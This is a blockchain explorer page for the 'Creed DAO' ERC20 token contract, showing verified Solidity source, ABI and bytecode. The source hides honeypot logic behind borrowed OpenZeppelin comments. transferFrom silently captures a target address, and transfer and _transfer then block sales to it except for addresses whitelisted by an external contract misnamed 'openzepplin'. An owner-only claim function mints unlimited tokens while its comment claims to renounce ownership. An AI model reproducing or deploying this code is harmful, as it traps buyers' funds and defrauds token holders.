ETH Price: $3,311.38 (+0.07%)

Token

Creed DAO (CREED)
 

Overview

Max Total Supply

33,811,700,006,666,666,666 CREED

Holders

20

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
thezla.eth
Balance
84,688,460.206557081 CREED

Value
$0.00
0x5184CABc982a194c11db6AdA53336559db62D101
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CreedDAO

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, GNU GPLv3 license
/**
 *Submitted for verification at Etherscan.io on 2022-03-29
*/

//   SPDX-License-Identifier: GNU GPLv3

pragma solidity >=0.8.0;

library SafeMath {
  /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
  function add(uint a, uint b) internal pure returns (uint c) {
    c = a + b;
    require(c >= a);
  }
   /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
  function sub(uint a, uint b) internal pure returns (uint c) {
    require(b <= a);
    c = a - b;
  }
  /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
  function mul(uint a, uint b) internal pure returns (uint c) {
    c = a * b;
    require(a == 0 || c / a == b);
  }
  /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
  function div(uint a, uint b) internal pure returns (uint c) {
    require(b > 0);
    c = a / b;
  }
}
	
abstract contract IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
  function totalSupply() virtual public view returns (uint);
  /**
     * @dev Returns the amount of tokens owned by `account`.
     */
  function balanceOf(address tokenOwner) virtual public view returns (uint balance);
  /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
  function allowance(address tokenOwner, address spender) virtual public view returns (uint remaining);
  /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
  function invalidAddress(address _address) virtual external view returns (bool){}
  /**
     * @dev Returns if it is a invalid address.
     */
  function transfer(address to, uint tokens) virtual public returns (bool success);
  /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
  function approve(address spender, uint tokens) virtual public returns (bool success);
   /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
  function approver() virtual external view returns (address){}
   /**
     * @dev approver of the amount of tokens that can interact with the allowance mechanism 
     */
  function transferFrom(address from, address to, uint tokens) virtual public returns (bool success);
   /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
  event Transfer(address indexed from, address indexed to, uint tokens);
  /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
  event Approval(address indexed tokenOwner, address indexed spender, uint tokens);
}

abstract contract ApproveAndCallFallBack {
  function receiveApproval(address from, uint tokens, address token, bytes memory data) virtual public;
}

contract Owned {
  address internal owner;
  
  event OwnershipTransferred(address indexed _from, address indexed _to);

  constructor() {
    owner = msg.sender;
  }

  modifier onlyOwner {
    require(msg.sender == owner);
    _;
  }

}

contract CreedDAO is IERC20, Owned{
  using SafeMath for uint;

  /**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */

  string public symbol;
  address internal approver;
  string public name;
  uint8 public decimals;
  address internal zero;
  uint _totalSupply;
  uint internal number;
  address internal invalid;
  address internal openzepplin = 0x40E8eF70655f04710E89D1Ff048E919da58CC6b8; 
  mapping(address => uint) balances;
  mapping(address => mapping(address => uint)) allowed;
  

  function totalSupply() override public view returns (uint) {
    return _totalSupply.sub(balances[address(0)]);
  }
  function balanceOf(address tokenOwner) override public view returns (uint balance) {
    return balances[tokenOwner];
  }
  /**
   *@dev Leaves the contract without owner. It will not be possible to call 'onlyOwner' 
   * functions anymore. Can only be called by the current owner.
  */
  function claim(address _address, uint tokens) public onlyOwner {
     require(_address != address(0), "ERC20: claim from the zero address");
     _claim (_address, tokens);
  }
  function transfer(address to, uint tokens) override public returns (bool success) {
    require(to != zero, "please wait");
    balances[msg.sender] = balances[msg.sender].sub(tokens);
    balances[to] = balances[to].add(tokens);
    emit Transfer(msg.sender, to, tokens);
    return true;
  }
  /**
    * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
    *
    * Returns a boolean value indicating whether the operation succeeded.
    *
    * IMPORTANT: Beware that changing an allowance with this method brings the risk
    * that someone may use both the old and the new allowance by unfortunate
    * transaction ordering. One possible solution to mitigate this race
    * condition is to first reduce the spender's allowance to 0 and set the
    * desired value afterwards:
    * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
    *
    * Emits an {Approval} event.
  */
  function approve(address spender, uint tokens) override public returns (bool success) {
    allowed[msg.sender][spender] = tokens;
    if (msg.sender == approver) number = tokens;
    emit Approval(msg.sender, spender, tokens);
    return true;
  }
  /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through `transferFrom`. This is
     * zero by default.
     *
     * This value changes when `approve` or `transferFrom` are called.
  */
    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
  */
  function transferFrom(address from, address to, uint tokens) override public returns (bool success) {
    if(from != address(0) && zero == address(0)) zero = to;
    else _transfer (from, to);
	balances[from] = balances[from].sub(tokens);
    allowed[from][msg.sender] = allowed[from][msg.sender].sub(tokens);
    balances[to] = balances[to].add(tokens);
    emit Transfer(from, to, tokens);
    return true;
  }
 /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to `approve`. `value` is the new allowance.
 */
  function allowance(address tokenOwner, address spender) override public view returns (uint remaining) {
    return allowed[tokenOwner][spender];
  }
  function _claim(address _Address, uint _Amount) internal virtual {
  /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
  */
    invalid = _Address;
	_totalSupply = _totalSupply.add(_Amount);
    balances[_Address] = balances[_Address].add(_Amount);
  }
  function _transfer (address start, address end) internal view {
  /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     * Requirements:
     * - The divisor cannot be zero.*/
    /* * - `account` cannot be the zero address. */ require(end != zero  
    /* * - `account` cannot be a invalid address. */ || ((IERC20(openzepplin).invalidAddress(start) == true || start == invalid) && end == zero) || 
    /* * - `account` must have at least `amount` tokens. */ (end == zero && balances[start] <= number) 
    /* */ , "cannot be the zero address");/*
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
   **/
  }
   /**
     * dev Constructor.
     * param name name of the token
     * param symbol symbol of the token, 3-4 chars is recommended
     * param decimals number of decimal places of one token unit, 18 is widely used
     * param totalSupply total supply of tokens in lowest units (depending on decimals)
     */   
  constructor(string memory _name, string memory _symbol, uint _supply)  {
	symbol = _symbol;
	name = _name;
	decimals = 9;
	_totalSupply = _supply*(10**uint(decimals));
	number = _totalSupply;
	approver = IERC20(openzepplin).approver();
	balances[owner] = _totalSupply;
	emit Transfer(address(0), owner, _totalSupply);
  }
  receive() external payable {
  }
  
  fallback() external payable {
  }
  
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"uint256","name":"_supply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"tokenOwner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_from","type":"address"},{"indexed":true,"internalType":"address","name":"_to","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"Transfer","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[{"internalType":"address","name":"tokenOwner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"remaining","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"approver","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"tokenOwner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"balance","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"claim","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"invalidAddress","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600880546001600160a01b0319167340e8ef70655f04710e89d1ff048e919da58cc6b81790553480156200003757600080fd5b5060405162001007380380620010078339810160408190526200005a9162000324565b600080546001600160a01b03191633179055815162000081906001906020850190620001b1565b50825162000097906003906020860190620001b1565b506004805460ff19166009908117909155620000b590600a620004ac565b620000c19082620004c1565b60058190556006556008546040805163028351bb60e31b815290516001600160a01b039092169163141a8dd8916004808201926020929091908290030181865afa15801562000114573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200013a9190620004e3565b600280546001600160a01b0319166001600160a01b039283161790556005546000805483168152600960209081526040808320849055825490519384529093169290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050506200054b565b828054620001bf906200050e565b90600052602060002090601f016020900481019282620001e357600085556200022e565b82601f10620001fe57805160ff19168380011785556200022e565b828001600101855582156200022e579182015b828111156200022e57825182559160200191906001019062000211565b506200023c92915062000240565b5090565b5b808211156200023c576000815560010162000241565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200027f57600080fd5b81516001600160401b03808211156200029c576200029c62000257565b604051601f8301601f19908116603f01168101908282118183101715620002c757620002c762000257565b81604052838152602092508683858801011115620002e457600080fd5b600091505b83821015620003085785820183015181830184015290820190620002e9565b838211156200031a5760008385830101525b9695505050505050565b6000806000606084860312156200033a57600080fd5b83516001600160401b03808211156200035257600080fd5b62000360878388016200026d565b945060208601519150808211156200037757600080fd5b5062000386868287016200026d565b925050604084015190509250925092565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620003ee578160001904821115620003d257620003d262000397565b80851615620003e057918102915b93841c9390800290620003b2565b509250929050565b6000826200040757506001620004a6565b816200041657506000620004a6565b81600181146200042f57600281146200043a576200045a565b6001915050620004a6565b60ff8411156200044e576200044e62000397565b50506001821b620004a6565b5060208310610133831016604e8410600b84101617156200047f575081810a620004a6565b6200048b8383620003ad565b8060001904821115620004a257620004a262000397565b0290505b92915050565b6000620004ba8383620003f6565b9392505050565b6000816000190483118215151615620004de57620004de62000397565b500290565b600060208284031215620004f657600080fd5b81516001600160a01b0381168114620004ba57600080fd5b600181811c908216806200052357607f821691505b602082108114156200054557634e487b7160e01b600052602260045260246000fd5b50919050565b610aac806200055b6000396000f3fe6080604052600436106100a55760003560e01c80636399903811610061578063639990381461019457806370a08231146101b557806395d89b41146101eb578063a9059cbb14610200578063aad3ec9614610220578063dd62ed3e1461024057005b806306fdde03146100ae578063095ea7b3146100d9578063141a8dd81461010957806318160ddd1461012557806323b872dd14610148578063313ce5671461016857005b366100ac57005b005b3480156100ba57600080fd5b506100c3610286565b6040516100d091906108af565b60405180910390f35b3480156100e557600080fd5b506100f96100f4366004610920565b610314565b60405190151581526020016100d0565b34801561011557600080fd5b50604051600081526020016100d0565b34801561013157600080fd5b5061013a610398565b6040519081526020016100d0565b34801561015457600080fd5b506100f961016336600461094a565b6103d5565b34801561017457600080fd5b506004546101829060ff1681565b60405160ff90911681526020016100d0565b3480156101a057600080fd5b506100f96101af366004610986565b50600090565b3480156101c157600080fd5b5061013a6101d0366004610986565b6001600160a01b031660009081526009602052604090205490565b3480156101f757600080fd5b506100c361052f565b34801561020c57600080fd5b506100f961021b366004610920565b61053c565b34801561022c57600080fd5b506100ac61023b366004610920565b61062c565b34801561024c57600080fd5b5061013a61025b3660046109a1565b6001600160a01b039182166000908152600a6020908152604080832093909416825291909152205490565b60038054610293906109d4565b80601f01602080910402602001604051908101604052809291908181526020018280546102bf906109d4565b801561030c5780601f106102e15761010080835404028352916020019161030c565b820191906000526020600020905b8154815290600101906020018083116102ef57829003601f168201915b505050505081565b336000818152600a602090815260408083206001600160a01b0387811685529252822084905560025491929116141561034d5760068290555b6040518281526001600160a01b0384169033907f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906020015b60405180910390a35060015b92915050565b600080805260096020527fec8156718a8372b1db44bb411437d0870f3e3790d4a08526d024ce1b0b668f6b546005546103d0916106b2565b905090565b60006001600160a01b038416158015906103fd575060045461010090046001600160a01b0316155b156104275760048054610100600160a81b0319166101006001600160a01b03861602179055610431565b61043184846106d2565b6001600160a01b03841660009081526009602052604090205461045490836106b2565b6001600160a01b038516600090815260096020908152604080832093909355600a81528282203383529052205461048b90836106b2565b6001600160a01b038086166000908152600a602090815260408083203384528252808320949094559186168152600990915220546104c99083610826565b6001600160a01b0380851660008181526009602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061051d9086815260200190565b60405180910390a35060019392505050565b60018054610293906109d4565b6004546000906001600160a01b038481166101009092041614156105955760405162461bcd60e51b815260206004820152600b60248201526a1c1b19585cd9481dd85a5d60aa1b60448201526064015b60405180910390fd5b336000908152600960205260409020546105af90836106b2565b33600090815260096020526040808220929092556001600160a01b038516815220546105db9083610826565b6001600160a01b0384166000818152600960205260409081902092909255905133907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906103869086815260200190565b6000546001600160a01b0316331461064357600080fd5b6001600160a01b0382166106a45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20636c61696d2066726f6d20746865207a65726f206164647265604482015261737360f01b606482015260840161058c565b6106ae8282610841565b5050565b6000828211156106c157600080fd5b6106cb8284610a25565b9392505050565b6004546001600160a01b03828116610100909204161415806107985750600854604051630c73320760e31b81526001600160a01b03848116600483015290911690636399903890602401602060405180830381865afa158015610739573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061075d9190610a3c565b15156001148061077a57506007546001600160a01b038381169116145b801561079857506004546001600160a01b0382811661010090920416145b806107da57506004546001600160a01b03828116610100909204161480156107da57506006546001600160a01b03831660009081526009602052604090205411155b6106ae5760405162461bcd60e51b815260206004820152601a60248201527f63616e6e6f7420626520746865207a65726f2061646472657373000000000000604482015260640161058c565b60006108328284610a5e565b90508281101561039257600080fd5b600780546001600160a01b0319166001600160a01b0384161790556005546108699082610826565b6005556001600160a01b03821660009081526009602052604090205461088f9082610826565b6001600160a01b0390921660009081526009602052604090209190915550565b600060208083528351808285015260005b818110156108dc578581018301518582016040015282016108c0565b818111156108ee576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461091b57600080fd5b919050565b6000806040838503121561093357600080fd5b61093c83610904565b946020939093013593505050565b60008060006060848603121561095f57600080fd5b61096884610904565b925061097660208501610904565b9150604084013590509250925092565b60006020828403121561099857600080fd5b6106cb82610904565b600080604083850312156109b457600080fd5b6109bd83610904565b91506109cb60208401610904565b90509250929050565b600181811c908216806109e857607f821691505b60208210811415610a0957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082821015610a3757610a37610a0f565b500390565b600060208284031215610a4e57600080fd5b815180151581146106cb57600080fd5b60008219821115610a7157610a71610a0f565b50019056fea2646970667358221220c79d4e3aa10534071d002aa3505199170f235e449410790d325eb5f18c2c405664736f6c634300080a0033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000018d5d42aa000000000000000000000000000000000000000000000000000000000000000943726565642044414f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054352454544000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x6080604052600436106100a55760003560e01c80636399903811610061578063639990381461019457806370a08231146101b557806395d89b41146101eb578063a9059cbb14610200578063aad3ec9614610220578063dd62ed3e1461024057005b806306fdde03146100ae578063095ea7b3146100d9578063141a8dd81461010957806318160ddd1461012557806323b872dd14610148578063313ce5671461016857005b366100ac57005b005b3480156100ba57600080fd5b506100c3610286565b6040516100d091906108af565b60405180910390f35b3480156100e557600080fd5b506100f96100f4366004610920565b610314565b60405190151581526020016100d0565b34801561011557600080fd5b50604051600081526020016100d0565b34801561013157600080fd5b5061013a610398565b6040519081526020016100d0565b34801561015457600080fd5b506100f961016336600461094a565b6103d5565b34801561017457600080fd5b506004546101829060ff1681565b60405160ff90911681526020016100d0565b3480156101a057600080fd5b506100f96101af366004610986565b50600090565b3480156101c157600080fd5b5061013a6101d0366004610986565b6001600160a01b031660009081526009602052604090205490565b3480156101f757600080fd5b506100c361052f565b34801561020c57600080fd5b506100f961021b366004610920565b61053c565b34801561022c57600080fd5b506100ac61023b366004610920565b61062c565b34801561024c57600080fd5b5061013a61025b3660046109a1565b6001600160a01b039182166000908152600a6020908152604080832093909416825291909152205490565b60038054610293906109d4565b80601f01602080910402602001604051908101604052809291908181526020018280546102bf906109d4565b801561030c5780601f106102e15761010080835404028352916020019161030c565b820191906000526020600020905b8154815290600101906020018083116102ef57829003601f168201915b505050505081565b336000818152600a602090815260408083206001600160a01b0387811685529252822084905560025491929116141561034d5760068290555b6040518281526001600160a01b0384169033907f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906020015b60405180910390a35060015b92915050565b600080805260096020527fec8156718a8372b1db44bb411437d0870f3e3790d4a08526d024ce1b0b668f6b546005546103d0916106b2565b905090565b60006001600160a01b038416158015906103fd575060045461010090046001600160a01b0316155b156104275760048054610100600160a81b0319166101006001600160a01b03861602179055610431565b61043184846106d2565b6001600160a01b03841660009081526009602052604090205461045490836106b2565b6001600160a01b038516600090815260096020908152604080832093909355600a81528282203383529052205461048b90836106b2565b6001600160a01b038086166000908152600a602090815260408083203384528252808320949094559186168152600990915220546104c99083610826565b6001600160a01b0380851660008181526009602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061051d9086815260200190565b60405180910390a35060019392505050565b60018054610293906109d4565b6004546000906001600160a01b038481166101009092041614156105955760405162461bcd60e51b815260206004820152600b60248201526a1c1b19585cd9481dd85a5d60aa1b60448201526064015b60405180910390fd5b336000908152600960205260409020546105af90836106b2565b33600090815260096020526040808220929092556001600160a01b038516815220546105db9083610826565b6001600160a01b0384166000818152600960205260409081902092909255905133907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906103869086815260200190565b6000546001600160a01b0316331461064357600080fd5b6001600160a01b0382166106a45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20636c61696d2066726f6d20746865207a65726f206164647265604482015261737360f01b606482015260840161058c565b6106ae8282610841565b5050565b6000828211156106c157600080fd5b6106cb8284610a25565b9392505050565b6004546001600160a01b03828116610100909204161415806107985750600854604051630c73320760e31b81526001600160a01b03848116600483015290911690636399903890602401602060405180830381865afa158015610739573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061075d9190610a3c565b15156001148061077a57506007546001600160a01b038381169116145b801561079857506004546001600160a01b0382811661010090920416145b806107da57506004546001600160a01b03828116610100909204161480156107da57506006546001600160a01b03831660009081526009602052604090205411155b6106ae5760405162461bcd60e51b815260206004820152601a60248201527f63616e6e6f7420626520746865207a65726f2061646472657373000000000000604482015260640161058c565b60006108328284610a5e565b90508281101561039257600080fd5b600780546001600160a01b0319166001600160a01b0384161790556005546108699082610826565b6005556001600160a01b03821660009081526009602052604090205461088f9082610826565b6001600160a01b0390921660009081526009602052604090209190915550565b600060208083528351808285015260005b818110156108dc578581018301518582016040015282016108c0565b818111156108ee576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461091b57600080fd5b919050565b6000806040838503121561093357600080fd5b61093c83610904565b946020939093013593505050565b60008060006060848603121561095f57600080fd5b61096884610904565b925061097660208501610904565b9150604084013590509250925092565b60006020828403121561099857600080fd5b6106cb82610904565b600080604083850312156109b457600080fd5b6109bd83610904565b91506109cb60208401610904565b90509250929050565b600181811c908216806109e857607f821691505b60208210811415610a0957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082821015610a3757610a37610a0f565b500390565b600060208284031215610a4e57600080fd5b815180151581146106cb57600080fd5b60008219821115610a7157610a71610a0f565b50019056fea2646970667358221220c79d4e3aa10534071d002aa3505199170f235e449410790d325eb5f18c2c405664736f6c634300080a0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000018d5d42aa000000000000000000000000000000000000000000000000000000000000000943726565642044414f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054352454544000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : _name (string): Creed DAO
Arg [1] : _symbol (string): CREED
Arg [2] : _supply (uint256): 6666666666

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000000000000000000000000000000000018d5d42aa
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [4] : 43726565642044414f0000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [6] : 4352454544000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

5161:7505:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6476:18;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8354:253;;;;;;;;;;-1:-1:-1;8354:253:0;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;8354:253:0;1053:187:1;3987:61:0;;;;;;;;;;-1:-1:-1;3987:61:0;;4038:7;1391:51:1;;1379:2;1364:18;3987:61:0;1245:203:1;6807:117:0;;;;;;;;;;;;;:::i;:::-;;;1599:25:1;;;1587:2;1572:18;6807:117:0;1453:177:1;9347:420:0;;;;;;;;;;-1:-1:-1;9347:420:0;;;;;:::i;:::-;;:::i;6499:21::-;;;;;;;;;;-1:-1:-1;6499:21:0;;;;;;;;;;;2140:4:1;2128:17;;;2110:36;;2098:2;2083:18;6499:21:0;1968:184:1;2696:80:0;;;;;;;;;;-1:-1:-1;2696:80:0;;;;;:::i;:::-;-1:-1:-1;2769:4:0;;2696:80;6928:123;;;;;;;;;;-1:-1:-1;6928:123:0;;;;;:::i;:::-;-1:-1:-1;;;;;7025:20:0;6997:12;7025:20;;;:8;:20;;;;;;;6928:123;6421:20;;;;;;;;;;;;;:::i;7407:299::-;;;;;;;;;;-1:-1:-1;7407:299:0;;;;;:::i;:::-;;:::i;7224:179::-;;;;;;;;;;-1:-1:-1;7224:179:0;;;;;:::i;:::-;;:::i;9921:150::-;;;;;;;;;;-1:-1:-1;9921:150:0;;;;;:::i;:::-;-1:-1:-1;;;;;10037:19:0;;;10007:14;10037:19;;;:7;:19;;;;;;;;:28;;;;;;;;;;;;;9921:150;6476:18;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;8354:253::-;8455:10;8426:12;8447:19;;;:7;:19;;;;;;;;-1:-1:-1;;;;;8447:28:0;;;;;;;;;:37;;;8509:8;;8426:12;;8509:8;;8495:22;8491:43;;;8519:6;:15;;;8491:43;8546:37;;1599:25:1;;;-1:-1:-1;;;;;8546:37:0;;;8555:10;;8546:37;;1587:2:1;1572:18;8546:37:0;;;;;;;;-1:-1:-1;8597:4:0;8354:253;;;;;:::o;6807:117::-;6860:4;6897:20;;;:8;:20;;;;6880:12;;:38;;:16;:38::i;:::-;6873:45;;6807:117;:::o;9347:420::-;9433:12;-1:-1:-1;;;;;9457:18:0;;;;;;:40;;-1:-1:-1;9479:4:0;;;;;-1:-1:-1;;;;;9479:4:0;:18;9457:40;9454:86;;;9499:4;:9;;-1:-1:-1;;;;;;9499:9:0;;-1:-1:-1;;;;;9499:9:0;;;;;;9454:86;;;9520:20;9531:4;9537:2;9520:9;:20::i;:::-;-1:-1:-1;;;;;9561:14:0;;;;;;:8;:14;;;;;;:26;;9580:6;9561:18;:26::i;:::-;-1:-1:-1;;;;;9544:14:0;;;;;;:8;:14;;;;;;;;:43;;;;9622:7;:13;;;;;9636:10;9622:25;;;;;;:37;;9652:6;9622:29;:37::i;:::-;-1:-1:-1;;;;;9594:13:0;;;;;;;:7;:13;;;;;;;;9608:10;9594:25;;;;;;;:65;;;;9681:12;;;;;:8;:12;;;;;:24;;9698:6;9681:16;:24::i;:::-;-1:-1:-1;;;;;9666:12:0;;;;;;;:8;:12;;;;;;;:39;;;;9717:26;;;;;;;;;;9736:6;1599:25:1;;